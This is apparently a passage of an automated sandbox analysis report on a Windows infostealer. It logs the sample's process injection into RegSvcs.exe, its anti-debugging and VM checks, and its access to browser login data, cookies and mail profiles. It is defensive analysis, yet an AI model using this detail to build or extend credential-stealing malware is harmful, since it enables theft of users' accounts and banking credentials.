                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599782Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599657Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599532Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599312Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593954Jump to behavior
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: RegSvcs.exe, 00000003.00000002.4584021509.0000000001276000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 6cicUo3f8g.exe, 00000000.00000003.2121444966.000000000151D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exebYZ7
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: RegSvcs.exe, 00000008.00000002.4589202032.000000000380E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: toggeries.exe, 00000007.00000003.2310262940.0000000000C24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe
                Source: RegSvcs.exe, 00000008.00000002.4583833736.0000000000908000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD9548 LdrInitializeThunk,LdrInitializeThunk,8_2_05FD9548
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00953F09 BlockInput,0_2_00953F09
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_008E3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_008E3B3A
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00915A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00915A7C
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_008E4B37 LoadLibraryA,GetProcAddress,0_2_008E4B37
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_01673558 mov eax, dword ptr fs:[00000030h]0_2_01673558
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_01674BB8 mov eax, dword ptr fs:[00000030h]0_2_01674BB8
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_01674C18 mov eax, dword ptr fs:[00000030h]0_2_01674C18
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00F654B8 mov eax, dword ptr fs:[00000030h]2_2_00F654B8
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00F66B78 mov eax, dword ptr fs:[00000030h]2_2_00F66B78
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00F66B18 mov eax, dword ptr fs:[00000030h]2_2_00F66B18
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 7_2_00C3F3D0 mov eax, dword ptr fs:[00000030h]7_2_00C3F3D0
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 7_2_00C40A90 mov eax, dword ptr fs:[00000030h]7_2_00C40A90
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 7_2_00C40A30 mov eax, dword ptr fs:[00000030h]7_2_00C40A30
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_009380A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_009380A9
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0090A124 SetUnhandledExceptionFilter,0_2_0090A124
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0090A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0090A155
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B0A124 SetUnhandledExceptionFilter,2_2_00B0A124
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B0A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00B0A155
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DB9008Jump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 4EE008Jump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_009387B1 LogonUserW,0_2_009387B1
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_008E3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_008E3B3A
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_008E48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008E48D7
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00944C27 mouse_event,0_2_00944C27
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\6cicUo3f8g.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Thebesian\toggeries.exe "C:\Users\user\AppData\Local\Thebesian\toggeries.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Thebesian\toggeries.exe" Jump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00937CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00937CAF
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0093874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0093874B
                Source: 6cicUo3f8g.exe, toggeries.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: 6cicUo3f8g.exe, toggeries.exeBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0090862B cpuid 0_2_0090862B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00914E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00914E87
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00921E06 GetUserNameW,0_2_00921E06
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00913F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00913F3A
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_008E49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008E49A0
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 2.2.toggeries.exe.cd0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.toggeries.exe.cd0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.toggeries.exe.3700000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.toggeries.exe.3700000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: toggeries.exe PID: 5916, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1672, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: toggeries.exe PID: 2184, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7076, type: MEMORYSTR
                Source: Yara matchFile source: 2.2.toggeries.exe.cd0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.toggeries.exe.cd0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.toggeries.exe.3700000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.toggeries.exe.3700000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: toggeries.exe PID: 5916, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1672, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: toggeries.exe PID: 2184, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: toggeries.exeBinary or memory string: WIN_81
                Source: toggeries.exeBinary or memory string: WIN_XP
                Source: toggeries.exeBinary or memory string: WIN_XPe
                Source: toggeries.exeBinary or memory string: WIN_VISTA
                Source: toggeries.exeBinary or memory string: WIN_7
                Source: toggeries.exeBinary or memory string: WIN_8
                Source: toggeries.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                Source: Yara matchFile source: 2.2.toggeries.exe.cd0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.toggeries.exe.cd0000.1.raw.unpack, type: UNPACKEDPE
